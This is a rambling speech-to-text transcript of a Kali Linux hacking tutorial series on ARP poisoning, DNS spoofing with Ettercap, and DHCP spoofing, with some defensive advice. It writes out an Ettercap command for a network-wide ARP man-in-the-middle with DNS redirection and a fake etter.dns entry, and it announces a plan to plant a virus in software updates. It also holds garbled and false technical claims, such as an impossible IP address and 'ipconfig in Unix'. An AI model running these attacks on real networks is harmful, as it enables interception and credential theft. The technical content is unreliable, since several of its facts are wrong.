Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So I'll be continuing the previous tutorial. So in the previous tutorial, I taught you about what is ARP exactly and how it works. And I also taught you about the man in the middle attack, what exactly it is. So here's a simple example of the Jessica, the receptionist, that tells the word to print the latest company's contact list. So I'll be teaching you this example in detail so that you will know what ARP poisoning or ARP spoofing is. And then we will take a look at later on at DNS spoofing, DNS poisoning, the difference between them, and later on finally the traffic tunneling. So here's an example of normal ARP communication. Jessica is a receptionist in a latest company, in a good company, and it tells the word, my MS Word, to print the company's latest contact list. But this is her first print job today, and her computer has the IP address 192.168.0.16. She wants to send the print job to HP LaserJet printer, and the IP address of the HP LaserJet printer is 192.168.0.45. So Jessica's computer broadcasts an ARP request to the entire local network asking who has the IP address 192.168.0.45 as seen in this diagram. And all the devices on the network ignore this ARP request except for the HP LaserJet printer. The printer recognizes its own IP in the request and sends an ARP reply. Hey, this is my IP address and here is my MAC address, as you can see in this diagram. So, and now Jessica's computer knows the printer's MAC address. It sends the print job to the connect device, and it also associates the printer's MAC address of 00 whatever it may be with the printer's IP address of 192.168.0.45 in its ARP table. So the founders of networking actually probably simplified the communication process for ARP so that it would function efficiently. But unfortunately, this simplicity also leads to major insecurity. Know why my short description of ARP doesn't mention any sort of authentication method? Because in ARP there is none, and there is quite a very much more insecure method of communicating between computers when there are no secure connections. ARP is very trusting. As you can say, the specific term would be gullible. And when a network device sends an ARP request, it simply trusts that when the ARP comes in, it really does come from the correct device. ARP provides no way to verify that the responding device is really who it says it is. So if I go ahead and spoof my MAC address over here, IP address and MAC address as well, but the first time it goes ahead and asks the method, then I'll straight away go ahead and tell I have this IP address and MAC address, and I'll send it back to them, and the computer will later think that I, the attacker, has this IP address and the MAC address. So this is how it works. In fact, many operating systems implement ARP so trustingly that the devices have not made an ARP request still accept ARP replies from other devices. So think like a malicious hack. You just learned that the ARP protocol has no way of verifying ARP replies. You have learned many devices accept ARP replies before even requesting them. And well, don't I craft a perfectly valid yet malicious ARP reply containing any arbitrary IP and MAC address I choose? I can do that. Since my victim's computer will blindly accept the ARP entry into its ARP table, I can force my victim's computer into thinking that any IP is related to any MAC address I want. That means it asks for any IP address, it will be my computer, no one else's. Better yet, I can broadcast my faked ARP reply to the victim's entire network and fool all of his computers. So that's how it can be done. So back to reality now, you probably understand why this common technique is called as ARP cache poisoning or just ARP poisoning, either way. The attacker lies to a device on your network, corrupting or poisoning its understanding of where other devices are. The frighteningly simple procedure enables the hacker to cause a variety of networking woes described next that I will be teaching you. And all the ARPs are now belong to us. The ability to associate any IP address with any MAC address provides hackers with many attack vectors, including denial of service, man in the middle, and MAC flooding. And just before you ask me what these things are, I would be teaching you that in a later part of the tutorial. And denial of service attack, a hacker can easily associate an operationally significant IP address to a false MAC address. For instance, let's say for example, a hacker can send an ARP reply associating your network router's IP address with a MAC address that doesn't exist. Your computers believe that they know where your real default gateway is, but in reality, they are sending any packet whose destination is not on the local segment into the great bit bucket into the sky. And in one move, the hacker has cut off your network from the internet, and he's only the person handling the account, handling the computer. After that, we have man in the middle attack, and as I told you, a hacker can exploit ARP cache poisoning to intercept network traffics between two devices in your network. For instance, let's say the hacker wants to see all the traffic between your computer, that's 192.168.0.12, and your internet router, that's 192.168.0.1. The hacker begins by sending a malicious ARP reply for which there was no previous request to your router, associating with his computer's MAC address with 192.168.0.12. Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer associating his MAC ID, MAC address with your 192.168.0.1. Now your machine thinks the hacker's computer is your router. Finally, the hacker turns on an operating system feature called as IP forwarding. This enables the hacker's machine to forward any network traffic it receives from your computer to the router. So when you try to go to the internet, your computer sends the network traffic to the hacker's machine, which it then forwards to the real router. Since the hacker is still forwarding your traffic to the internet router, you remain unaware that he is intercepting all your network traffic and perhaps also sniffing your clear text passwords or hijacking your secure internet sessions as well. And then we have another attack, which is MAC flooding. MAC flooding is an ARP cache poisoning technique aimed at network switches. If you need a reminder about the difference between a hub and a switch, then when certain switches are, you can go and check over the internet and you'll get a lot of information. When certain switches are overloaded, they often drop into a hub mode, and in hub mode, the switch is too busy to enforce its port security features, and it just broadcasts all network traffic to every computer in our network. And by flooding a switch's ARP table with a ton of spoofed ARP replies, a hacker can overload many vendor switches and then packet sniff your network while the switch is in the hub. So you might be a bit more scared right now that if the hackers can do all of these things, then what can you do? But just calm down. This is the scary stuff. ARP cache poisoning is trivial to exploit, yet that it can result in very significant network compromise. However, before you jump to any other looking at any other videos such as DEFCON 7, you may notice that the major mitigating factor, only local attackers can exploit ARP's insecurities. A hacker would need either physical access to your network or control of a machine on your local network in order to deliver an ARP cache poisoning attack. ARP's insecurities cannot be exploited remotely. He needs to be physically present there. That said, hackers have known to be good to gain local access to networks. Good network administrators should be aware of the ARP cache poisoning techniques as well. Since ARP cache poisoning results from lack of security in a protocol that is required for TCP/IP networking to function, you cannot fix it, but you can help prevent ARP attacks using some of the techniques such as keep your network small. If you manage a small network, you might try using static IP addresses and static ARP tables, or using command line CLI commands such as ipconfig/all in Windows or ipconfig in Unix, or you can learn the IP address and MAC address of every device in your network. Then using the ARP -s command, you can add static ARP entries for all your known devices. Static means unchanging, that cannot be changed, and dynamic IP address means something that can be changed. This prevents the hackers from adding spoofed ARP entries for devices in your network. You can even create a login script that would add these boot static changes to your PC every time they boot. However, static ARP entries are hard to maintain, impossible in large networks. That's because every device you add to your network has to be manually added to your ARP script or entered into each machine's ARP table. But if you manage fewer than 24 devices, this technique might work for you. And if you have large networks, if you manage a large network, research your networks with port security features. One port security feature lets you force your switches to allow only one MAC address for each physical port on the switch. This prevents hackers from changing the MAC address of their machine or from trying to map more than one MAC address to their machine. It can often help prevent ARP-based man-in-the-middle or monkey-in-the-middle attacks as well. And if you have other types of network, that means for all networks, your best defense is understanding ARP poisoning and monitoring for it. And I'll highly recommend deploying an ARP monitoring tool such as ARP Watch to alert you when an unusual ARP communication occurs. This kind of vigilance is still the greatest weapon against all kind of attacks. And the best line that I have heard on this specific hack from Robert Louis Stevenson is that the cruelest lies are often told in silence. And that's how ARP poisoning is exactly. So yes, that's how it works. So that would be it for this tutorial. And since you know how ARP poisoning works, in the next tutorial I will be teaching you about the DNS poisoning and how it works exactly, and what is the actual difference between DNS poisoning and DNS poisoning versus DNS spoofing. So that's it for this tutorial. Have a nice day ahead.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So the next part that I would be teaching you, as I told you previously, was the evil grade tutorial, in which I would be going ahead and injecting my virus inside the softwares or software updates, so that any person who goes ahead and installs the updates, then I will be easily be able to go ahead and access their computer, and it will be forever until unless the updates are specifically uninstalled. So, but before that, I need to go and teach you the MIDM attack, that is man in the middle attack, because without that, you won't be able to understand them perfectly. And for you to understand, I yesterday showed you about the ARP spoofing or poisoning, or the ARP cache poisoning, which is almost the same, and the ARP spoofing is already a part of ARP poisoning. So there's not a difference much between the two. But if you are going ahead through this tutorial today, then I will assume that you have at least the basic fundamentals of TCP/IP. You need to know what domain name systems are, the DNS servers, how they work, at least the basic fundamentals of TCP/IP and the CCNA or networking. You should know how they work and how the SMTP protocol and the UDP datagram protocol works exactly. User datagram protocol. So if you know all of these, then you can go ahead and come back to this tutorial, and it will be quite easy for you to understand. And even if you don't know about all of these fundamentals, then you can just go on the web, search about them a bit. Just the important parts like the TCP/IP, UDP, SMTP, HTTP, and all these things. And once you have the basics of all these things, you can easily go ahead and read that for about 2 to 3 hours for different parts, and you will have the basics. Trust me. And those basics are enough for you to understand what DNS spoofing is. So once you know exactly how this works, then you can slowly go ahead and come back to this tutorial and take a look at this. So if you know, and if you already know what the basic fundamentals are, then let me tell you one thing. There are two different things for DNS hacking. That is, one is DNS spoofing and another one is DNS poisoning. So if you go ahead and check on the Wikipedia will say that DNS spoofing is the same as DNS poisoning, but it is not, because despite what Wikipedia may say, they are not the same. Roughly speaking, DNS cache poisoning is one way to do DNS spoofing, but there are other ways to do it as well. And DNS spoofing refers to the broad category of attacks that spoof DNS records. It is a category of attack and an end goal of the attack rather than a particular attack mechanism. So it's an attack in whole, not any part of an attack. And there are many different ways to do DNS spoofing, such as compromising a DNS server, mounting a DNS, you can say as, let's say, for example, mounting a DNS cache poisoning attack, such as the Kaminsky attack against a vulnerable server from Kali Linux, or mount a man-in-the-middle attack if you can get access to the network and guess a sequence of number, maybe making many requests, or be a false base station and lie about the DNS server to use, and probably many more. So DNS cache poisoning is one way to do DNS spoofing. DNS cache poisoning refers to following scenarios, such as many end users use the same DNS cache, and an attacker may manage to inject a forged DNS entry into their cache memory. For example, many ISP providers will run caching DNS server and arrange for their customers, the end users, let's say, to try the IP ISP's server first, and then later on connect to the actual internet. So if an attacker can find some way to get to the caching DNS server to cache an incorrect record, then the attacker is set. He has managed to successfully spoof the DNS records and affect all the end users who rely upon this cache memory. So how does an attacker manage to poison a DNS cache? Well, One common way is to mount some DNS spoofing attack on the DNS request from the cache to the ultimate DNS server. And as you can see, it works exactly, it's given over here. This is the user, this is a DNS server, and this is the internet, and I would be using the internet to get to a DNS server, and I will cache it. And these are the two internet services which will go ahead and provide. But the actual way of connecting would it will go and search the internet, and let's say it will ask for google.com, but it will redirect itself to me because I would be posting as google.com. Then the DNS server will go ahead and cache it in its memory, and whenever the user tries to go ahead and try to get any information, he will connect to the DNS server. It will transfer it back to me, and since I need to provide something to the user so that he does not become suspicious, I will go ahead and redirect the traffic to the google.com. So whatever the traffic is going on in between will go through me and not directly. So I will have all the time in the world to do whatever I want, and the person will not even know that. So how does an attacker manage to poison the DNS cache? This will get a little recursive right now because basically you use any DNS spoofing attack, get the cache to accept a spoofed record. Here you can use any DNS spoofing attack that you can, and afterwards the result is that the cache will cache the bogus record, and consequently many end users will now accept that spoofed record too. So that's how the DNS cache, that's the difference between the DNS poisoning and the DNS spoofing. Now, get back to our main topic, that would be the DNS spoofing and how exactly it works. So in the first tutorials of series, I taught you about the normal ARP communication and how the ARP cache of a device can be poisoned in order to redirect machines, network traffic through another machine, and possible malicious intent. The seemingly advanced MITM attack or man-in-the-middle attack, or known as ARP cache poisoning, is done easily with the right software. In in the previous tutorial, I discussed with you a type of attack like the ARP cache poisoning, and ARP DNS spoofing is almost the same. If you have not read my previous tutorial, then you need to go. I would recommend you to do so that now, because as this tutorial will go on building, you will need the basics, and ARP poisoning or knowing how it works is very important for you to understand DNS poisoning as well. So DNS spoofing is a man-in-the-middle attack used to supply false DNS information to the host so that when they attempt to browse, let's say for example www. let's say Bank of America or bankofindia.com, there is no such thing as Bank of India, but still I just took a random name, or let's say bankofamerica.com at the IP address 192.168.2.23, something like that, they're actually sent to a fake www.bankofamerica.com residing at the IP address which is totally different, which an attacker has created in order to steal the online banking credentials and account information from unsuspecting users. And this is actually done quite easily, and we will see how it works exactly and how it is done, and finally how to defend against this kind of attack. And I will also go and teach you how the normal DNS communication works, that you need to know the basics of how the domain name system works and how they can be like you can say as a serious threat if not taken care of properly. And there's more than one way to go ahead and do these kinds of DNS spoofing. You can have multiple tutorials, or you don't even need sometime the proper software. You can just, if you have sufficient network information, you can still do that. And I will be using the technique over here called as DNS ID spoofing. And every DNS query that would be sent down over the network will contain a uniquely generated identification number for the purpose of its identity queries and nothing else only. So I will complete this process by doing one or two steps with a single tool, and we will see the ARP cache poison and how it works. And the goal of this scenario will be to get the users on the network, and a depiction of this attack I will be showing you in exact images right now. So, but that would be in the next tutorial, and that's it for this tutorial, guys. So now, since you have the basics, just let's go ahead and check how it works exactly. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, we will be taking a look at how actual the DNS communication works. The DNS protocol, that is the domain name system, and as defined by the in the RFC 1034 and 1035, is what some consider one of the most important protocols in use by the internet. This is because DNS is the, you can say, as proverbial molasses that holds the bread together. In a nutshell, whatever you type in the web address such as http://www.google.com into your browser,
A DNS request is made to a DNS server in order to find out the IP address that name resolves to. This is because routers and the devices that interconnect the internet do not understand google.com. They only understand IP addresses such as 74.125.95.103, and that's for Google. So if you go ahead and check over here, I'll just go ahead and show you. Instead of typing that, if you go ahead and type 74.125.95.103, let's see what happens. Because this is an IP address of google.com, and I don't know. Okay, my bad. If I just go ahead and show it out to you, perfect. It should actually open google.com, but let's check what's the problem over here. And yeah, whois counter JFK. So it should show me that this is the IP address of google.com. It's way too slow, I believe. Okay. Yeah, perfect. As you can see, this is the IP address. The host is the same, and United States. And so whenever you go and type google.com, it will search which IP address is registered to google.com, and no matter what the name is, the name will not be similar for any kind of website. It may be like google.com, google.org or something like that, but no matter what happens, the name will not be the same, because the name goes ahead and provides the IP address a unique identification when the DNS tries to go ahead and gather any information related to that. That is the reason. Let me just start. Okay. So this is so the routers understand only the IP address and not the actual name, and later on the name which is registered under the IP address will get converted to the IP address, and the router will then be able to identify how what exact the DNS is of an IP address. So DNS server itself works by storing a database of entries, which is called as resource records of IP addresses, to DNS name mappings, communicating those resource records to clients and communicating those resource records to other DNS servers as well. The architecture of DNS servers throughout enterprises and the internet is something that can be a bit complicated. As a matter of fact, there are a number of books dedicated to DNS architecture. I will not cover the architectural aspects or even the different types of DNS traffic. You can review that various DNS traffics related to RFCs later on their own website. But we will be taking a look at the basic DNS transaction, and this is how it looks like. DNS client and the DNS query the response. So DNS functions in a query response type format. A client wishing to resolve a DNS name to an IP address sends a query to the DNS server, and the server sends the requested information in its response. From the client's perspective, only two packets that are seen are this query and response only. The scenario gets a bit more complicated or complex when you consider DNS recursion. Due to the hierarchical nature of the DNS structure of the internet, DNS servers need the ability to communicate with each other, and in order to go ahead and locate the answers for the queries submitted to the clients. After all, it might be fair expect our internal DNS servers to know the name to IP address mapping of our local intranet server, but we cannot expect it to know the IP address correlated with Dell or Google, because that would be illegal again. This is where the recursion comes into play. Recursion is when one DNS server queries another DNS server on behalf of a client who has made a request. Basically, this turns a DNS server into a client itself, as you can see in this system, this one perfectly. Okay, and spoofing DNS, there is more than one way to skin a cat totally, and there is definitely more than one method available for performing DNS spoofing. I will be using a technique called as DNS ID spoofing now. So, and before I proceed, as you can see, this is the local DNS server, this is the client, and this is the external DNS, and this is the attacker. So I will normally go ahead and relocate everything from over here in this way. So I will not directly send this to if it asks for Yahoo, I will not send it to Yahoo. I will send it to my own website, which is fake. The user will log in or do whatever he wants to, and I will get all the information there, and then I will redirect it to yahoo.com. The same way it works. I am the local DNS server, which is the attacker. A response query is sent, the query response comes back, and I send it back to the client. That's how it works. So There's more than one way, as I told you, and every DNS query can be modified or changed depending upon the tools that you have. Every DNS that is sent out over the network contains a uniquely generated identification number. That's purpose is to identify queries and response and tie them all together. This means that if our attacking computer can intercept a DNS query sent out from a target device, all we have to do is create a fake packet that contains that identification number in order for the packet to be accepted by that target. And I will complete this process by doing two steps with a single tool. First, I will ARP cache poison the target device to reroute its traffic through our attacking host so that we can intercept the DNS request. Then we will actually send the spoofed packet. The goal of this scenario is to get the users on the target network to visit our malicious website rather than the website they are attempting to access, as you can see over here in this figure. The DNS spoofing attack using the DNS ID spoofing method, there are very few different tools available over here in total. So there are different types of tool available can be used to perform DNS spoofing. I will be using the ItterCap, which has both Windows and Linux version, and it has a graphic user interface as well, so it will be easier for you to understand. And you can download ItterCap from its own website. I'll show you if you're using a Windows version. Probably not, because this tutorial is for Kali, but still, if you need some time, then you can go ahead and see at SourceForge website. And you can go ahead and download the star.gz if you're using it on Linux or something else, or Debian, something like that. And if it is for Windows, you can go ahead and download it from over here. And it's not much of a big file, and these are the easy files, easy to use files, so you can download either of these. This is the latest one, and I believe it was updated long time ago. Yep, fine. The latest version for Linux is over here, which is 0.7.6, and for the Windows version it has 0.7.4. I believe the 7.6 version has not yet been updated for the Windows version. And there is one more reason why I use Linux rather than Windows. Okay, so you can download the ItterCap from there, and if you do a bit of research on the website, you will find that ItterCap has a great deal of functionality, and that is beyond DNS spoofing, and it is commonly used in many of the MITM attacks. So if you're installing ItterCap on a Windows machine, you will notice it has a great graphic user interface, which can say as which works great. But for this tutorial, I will be using a command line interface, and prior to executing ItterCap, a bit of configuration is required, and ItterCap at its core is a packet sniffer which utilizes various plugins to do the various types of attacks it can perform. So you need to go ahead and configure it in different way every time you want to use different types of attacks. The DNS spoof plugin is that what we will be doing in the attack in this example. So we have to modify the configuration file associated with that plugin. On a Windows system, this can be located at C program files, ItterCap ng share letter.dns, and if you're using Windows at Kali Linux, you can find it at root/user, that user means usr/share /ItterCap/Itter.dns. And this file is fairly simple and contains the DNS records you wish to spoof. For our purpose, we would like to use any user attempting to go to yahoo.com to be redirected to the host on the local network. So we will be able to add the entry highlighted over here in this figure. As you can see, this is the IP address and this is the original yahoo.com. So every time the user tries to connect to this part, it will be redirected to us. That's how it will work. And these entries basically tell the DNS spoof plugin that when it sees a DNS query for yahoo.com, or let's say www.yahoo.com, for an 8 type resource record, it should supply the IP address 172.168.1.1.6.100 in response. In a realistic scenario, the device at 172.168.1.1.6.100 would be running from some form of web server software that would present the user with the fake website as well. So once the file is configured, we are free to execute the command string that will launch the attack. And the command string will use different types of options. So that would be it for this tutorial, and I will be continuing the same part in the next tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, I taught you about how it works exactly, the DNS spoofing, DNS poisoning, and about this software, how it works exactly. So I will also go ahead and at the same time start my Kali Linux, so it will be easier for us to understand exactly how it will work. So I'll just open my Linux and I will power this on. So I would be using Windows version of the ItterCap. You can, sorry, not the Windows, the Linux version of the ItterCap. If you want Windows, then you can still go and do that. I would be teaching for Windows version how you need to do that, but I will be showing that on Kali Linux. Windows would be on my PowerPoint presentation, and the actual tutorial will be on the Kali Linux. So it will be easier for you to work on either of the versions. So to start the EtherCap, just go over here in the applications, internet, and you can see EtherCap over here. Just go ahead and start that. Okay, and I'll just go ahead and maximize this. And you can go ahead and select this over here. And the first thing that we need to do would be to go ahead and change the entries of the yahoo.com. So you can go ahead and type, let me check if I have gedit installed. Okay, I have it. So I'll just type gedit / user share and ethercap and ether period DNS. Okay, I did not expect this to be NT. Let me check. Let me just open that and see. Yeah. Okay, so we have ethercap.png or filter fields, and okay, we don't have the ether period DNS file. So let's go ahead and check all of these files. Okay, no, this is not the one that we want. Let's check the ether period filter. We don't want the filter as well. Let's check. I believe that we have different versions, so it will look like ethergap DNS, ether DNS host file for DNS plugin. Perfect. So we need to go ahead and check for the sample host file on the DNS spoof. So let's go ahead and check that where it is exactly. Not here. I believe we will need to go ahead and create another etherperiod DNS file, which is unlike anything else you will be seeing on Windows version. So yeah, that's right. Let's go ahead and open this. And over here, I will be typing two specific things that would be the yahoo.com. So, and I'll show you over here as well how exactly it will work. Okay, so it will look like this. You will have to add these two things, yahoo.com and www.yahoo.com, and the IP address is in front of them. And once the file is configured and saved, you are free to execute a command string that will launch the attack. And the command string uses options such as -t, which specifies the use of the text-based interface, or -q that runs the command in quiet mode so that captured packets are not output to the screen. -p DNS spoof that specifies the use of DNS spoof plugin, and -m ARP that initiates an MITM ARP poisoning attack to intercept packets between the host. And it specifies the entire network as the targets of the attack. And the final command string for our purposes would be ethercap period exe space -t space -q lowercase q space -p DNS spoof -m and ARP space / space // The space, the slash, the four slashes specifies the entire network as the targets of the attack, and the final command string would look like this portion over here. Once you go ahead and run this, running the command would begin a two-phased attack. First, poisoning the ARP cache of the device on the network, and then transmitting the fake DNS query response. So as you can see, we have the two phases of the attack over here. One is the configuration, and another one is the actual attack. And once initiated, anybody attempting to access the yahoo.com will be redirected to our malicious site. And defending against DNS spoofing, now I will teach you how that will work. Now we know how DNS spoofing works exactly. DNS spoofing is difficult to defend against due to the attacks mostly being passive by nature. And typically you will never know the DNS is being spoofed until it has actually happened. Because what you get is a web page that is different than that you are expecting. And in very targeted attacks, it is very possible that you may never know you have been tricked into to enter your credentials into a false site until you receive a call from the bank wondering why you have just purchased a new board for, let's say, for any of your reasons. And that being said, there are still a few things that can be done to defend against these type of attacks. First thing first, secure your internal machines. Attacks like these are commonly executed from inside the network. So if your network devices are secure, then there is less chance of let's say, less chance of these compromised hosts being used to launch a spoofing attack. And don't or never rely on DNS for secure system. Highly sensitive or secure systems that you typically won't be browsing on internet. It is often a best practice not to use DNS if you're not using that for browsing. If you're just using that as a firewall, then it is best that you do not use DNS. You need to specifically provide your IP addresses. If you have software that relies on host name to function, then those can be specifically specified manually in the device's host file, and or use an IDS. That would be the best part. That is an intrusion detection system. And IDS, when placed and deployed correctly, it can typically pick up most forms of ARP cache poisoning and DNS spoofing. And use DNSSEC. DNSSEC, DNSSEC, it is a newer alternative to DNS that uses digitally signed DNS records to ensure the validity of a query response. DNSSEC is not yet in, I can say, as it's not in wide development, but it has been widely accepted as the future of DNS. So this is much so that the United States DoD has mandated all the MIL and GOV domains begin using the DNSSEC within the next year. And you can read more about the DNSSEC on their own website, and you will know how exactly it will look like. And finally, DNS spoofing is a very lethal form of my-team attack, and when it is paired with the right skill and the malicious intent, using this technique, we can utilize phishing techniques to deceptively steal credentials, install malware with a drive-by exploit, or even cause a denial of service attack condition. In the next tutorial, again, I will be teaching you about how we can go ahead and use the DHCP servers and actually going ahead and poisoning these things. And there are different parts such as the DHCP spoofing, ICMP redirection, or even the port stealing. And these are quite the type of mature attacks that a hacker will use. He will not just go ahead and most of the time people first try phishing, and if phishing works exactly, which do work most of the time, 70% of the time. If they don't, if they do, then it's good. If they don't, then they will try these types of attacks, MITM and all these things, because these require social engineering to get path through your network. The first thing, and the second thing would be to actually go ahead and social engineer your way to make a website that looks actually legit. But there would be extremely minor differences, such as instead of using a google.com, you can go ahead and use, I'll show you some examples as to how the fake websites would look like over here. Let me just check if I have the harvester example still present. Let me check. Okay. Sure that I'll use URL crazy. So if I go and type URL crazy Google space google.com, then I will get each and every fake website that will go ahead and call itself google.com, but it will not be. So let's go ahead and check, for example. Okay, perfect. So as you can see, we have n number of websites such as google.com and googles.com or googler.com, googly.com, and you won't even be able to recognize that because you'll be using it normally on the internet, and yes, you will have no idea how or when you will be let's say tricked to go ahead and visit this website. So let's, for the time being, let's go ahead and visit this specific website, or let's go ahead and visit the one which looks almost real to us. Let's use google.com or google.com. Let's go ahead and copy that, and let's see if we will be able to go ahead and visit this website. Okay, I believe the account, it would have been temporarily shut down, I believe. Okay, it's no, I want googleart.com. Okay, yeah, perfect. And let's see. Okay, this is the google.com. So if you go ahead and see this website, normally if you don't actually look in, unless you actually look into it, you won't even recognize. You will just go ahead and read this as google.com, and you will just go ahead and read everything. So this is how a fake website looks like, and normally people will trick you into visiting these websites and you will be fooled. And it is not just the it it will they will also go ahead and use the social engineering to go ahead and social engineer their way through it. So that is it for this tutorial, guys. In the next tutorial I will be continuing with DHCP spoofing. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So welcome to the next tutorial of DHCP spoofing. So before I proceed, let's go ahead and check on Google what DHCP spoofing is exactly and how they actually define it and what is actually the difference and how one can go ahead and spoof that. So I believe you can see DHCP spoofing is a dynamic host configuration protocol that is a client and a server protocol that automatically provides an IP host with its IP address and related configurations such as subnet mask and default gateway. So as you can see that anytime I go and connect to the internet, I am automatically provided the IP addresses for all of these things. Let me just go and open it out to you. I'm automatically provided these IP addresses and the subnet mask and the default gateway. And these all things are being done by the DHCP protocol, that's Dynamic Host Configuration Protocol. So how can you might be wondering how can one go ahead and spoof a DHCP protocol or something like that? Yes, we can do that, and in computer world we can do anything that we want. So this is one of the layer 2 attacks inside a LAN network that is very dangerous for information privacy and LAN integrity, and it is a proof spoofing attack. So this is a special kind of attack where the attacker can gain access to the network traffic by spoofing responses that would be sent by a valid DHCP server. So you won't even recognize whether it's fake or it's original. And this attack is using a technique, again the same technique, that's ARP spoofing, also called as ARP cache poisoning or the ARP poison routing, that's APR, and that is a simple LAN attack technique. ARP spoofing will allow the attacker to intercept frames on the LAN and modify the traffic, stop the traffic, or simply snip all the traffic and do whatever he wants. So this is possible because all the communication in LAN is now crossing the attacker's interface, and this communication is vulnerable to packet sniffing as well. So you might be wondering what would be the difference between DNS spoofing or ARP-CP spoofing, because they all do the same thing, but still they're different ways. Yes, you are right. The reason being that all of them have different faults and flaws, and sometimes you may not be able to go ahead with the ARP spoofing or DNS spoofing, but one or the other thing always works because there's one or the other fault in a line, and you can always go ahead and take down any kind of network. The only thing that you need would be a proper open port or a proper way to go ahead and break into that firewall. So that's how it will work. So there are different ways which go ahead and finally lead to the same thing, but one thing can be way too hard, whereas the other thing can be way too simple, even though both provides the same thing. And that's why I will be teaching you DHCP spoofing, even though it does the same thing, but it has its own different way, and this will be far easier than the previous versions. So in short words, client PC is sending a DHCP request on the network, as you can see over here. So DHCP response, and this request is a broadcast from all hosts on the LAN, and all the hosts on the LAN will receive it. Only the DHCP server knows what this request means, and in the normal situation only the real DHCP server will reply to this request. So DHCP server is then replying to the client with messages that will configure the host client PC with IP address, subnet mask, and the default gateway. So this is the attacker, the rogue DHCP server, and this is the original DHCP server. So when we have an attacker PC in the network, he will stimulate the DHCP server on his host PC, that's host computer. And with this action, he will be able to reply to DHCP request before the real DHCP server because it's closer to the client host. So it will configure the client host with IP address of the subnet, but it will also give to host false default gateway and maybe even false DNS server address. So what will happen exactly is that when the client PC requests for DHCP response, it will go over here, and since the attacker's DHCP server is nearer than the corporate server, the attacker will quickly go ahead and give a response back to it before it goes ahead and reaches it to the corporate server. And as soon as it reaches it, the first one reaches the DHCP server. No matter even if it goes ahead and gets back to the server, it will go ahead and discard that because it has already received a DHCP response. And later on, no matter what happens, even if it tries to connect to the corporate original server again, they will not be able to connect. The reason being that it has already the attacker has already went ahead and poisoned its cache memory, and no matter which when it tries to connect, it will always connect to the rogue attacker's DHCP server. And it will go ahead and configure the client host with IP address of that subnet, and it will give out a false default gateway as well, maybe even a false DNS server address. DNS server address and default gateways addresses will both be the IP address of the attacker computer itself. And in this manner, he will point all the communication of, let's say, the client host to himself. Later, he will make possible, it will be possible for him to forward the frames from the client host to real destination in order to make the client communication more real and possible, so that even if it goes ahead and gather DHCP server will later go ahead and convert itself for ARP poisoning or in other attack, so that this will be the middle PC, the main, it will act as the hub, and all the packets that will pass, it will pass through the DHCP server, and then it will go ahead and pass to the corporate server and then the internet, and whatever information comes back from the internet, it will then go ahead and come back to the attacker, and it will be the choice of the attacker what to send back to the person. Let's say, for example, this is the internet, this is the rogue attacker, and over here at the random right side there would be, let's say, for example, boy A, and over here it would be boy B, and over here it would be boy A. So what will happen exactly is that, let's say, for example, to be a more practical example, boy A is using WhatsApp on his computer, and he wants to tell the boy B to go ahead, and he's telling that I have the money for your, let's say, I have your pocket money, your dad has given it to me, and this is the account number of your pocket money, and he will send it back on this, and just go ahead and gather the money from your this is bank account, and he will transfer a virtual check over the computer, but it will receive it to this person, the attacker, and he will send back the response that okay, father has not received the pocket money, and he will be giving it to me later on at later point of time. So the boy B will go ahead and respond it back to the person. It's okay, fine, I will go ahead and collect it later from my father. But it will not reach the client PC directly. It will come back to the attacker, and the attacker will send, okay, fine, no problem, I will collect it from the bank. So for both the parties, boy A and boy B, they don't need to communicate anymore, since they both will think that their original message has been passed. But the original message is only known by the attacker over here. The reason being that he knows what is happening and which account number it is, and later on he will go ahead and gather the check, and he will disappear later on. And the people below over here will not even be able to recognize what happened, and later on they both will be cursing each other, stating that they are lying, and yes, that will be the problem between them. And so it will be either this person has went ahead and used all the money for himself, or it will be him. But the attacker, no one will even recognize that he was there, and that's how it works. So the attacker can also sniff frames, and he can also go ahead and strip off the SSL if the person is using SSH service. And as you can see from the picture, the DHCP spoofing device is situated in the local area network position. So he has the possibility to reply to the client DHCP request before the request is able to reach to the real DHCP server. The legitimate server may also reply, but if the spoofing device is on the same segment as the client, its reply to the client will arrive first. And the intruder DHCP reply offers an IP address and supporting information that designates the intruder as a default gateway or the domain name system. So what this person will do exactly, it is that first it will go ahead and respond it back to itself, and the original message will be passed over here. But by the time this response, the original response, the first response comes back from the corporate server, the attacker will already have the access, and the DHCP response may not even pass through this. It may pass if the attacker is already connected. The response will pass through the attacker's point of view, and once it goes ahead and transfers from the attacker's point, then the attacker will even know what the IP address and the MAC ID of the DHCP server are and what are, let's say, a gateway or default gateway, the attacker may then go ahead and spoof its original gateway, the same as a corporate server. So even if the person goes and tries to get the IP address where it was connected, it will see the corporate server's original IP address and the MAC ID, which are spoofed by the attacker, and they won't even come to know because they will think that it was normally connected, and it may be some other problem why they were not able to connect, or they have had a loss for some any X amount of money. So and the intruder DHCP server offers an IP address and supporting information that designates the intruder as a default gateway or the DNS server, that's the domain name system. And in the case of gateway, the clients then forward packets to the attacking device, which in turn sends them to the desired destination. So this is known as the MITM attack, and it may be entirely undetected as the intruder intercepts the data flow to the network, but it is not stopping the network traffic, because if it stops, then the client may try to connect to the corporate server in some other way, or he may troubleshoot it, and that is not what the attacker wants. So he will not go ahead and attacker will not go ahead and stop the traffic unless it is actually necessary. So the ARP spoofing can also be used for good purposes, and very often we are being able to see wireless networks that are redirecting us to sign up page when we want to access wireless LAN or internet across the Wi-Fi. So network registration tools may redirect unregistered hosts to a sign up page before allowing them full access to the network. It is mostly used in Wi-Fi hotspots or hotels such as McDonald's or something like that. When you go over there and you try to access the free internet, they will first redirect you to their own Airtel or whichever Vodafone or whichever internet they are using, and they will go ahead and ask you to go ahead and first use your let's say your mobile number to go ahead and register. And as soon as you register your mobile number, you will get a 6 to 7 digit code which you'll have to enter, and only then the internet will start. The reason for that would be that any random person can go ahead and use the internet for fake reasons, and the person who is actually going ahead and using that, if he uses for any malicious purposes, then the owner of the Wi-Fi or the hotspot will be able to recognize by using the mobile number, until unless the mobile number is also fake and that is also spoofed from somewhere else. So I cannot say that there can be always solutions to all the problems, because as the number of solutions increases, the number of problems will always increase. And so it is mostly used in McDonald's and other sorts of network to control the access of mobile devices to the internet, and sometimes make user pay for the internet as. So for that purpose, they are redirected using ARP spoofing to a device known as head-end processor 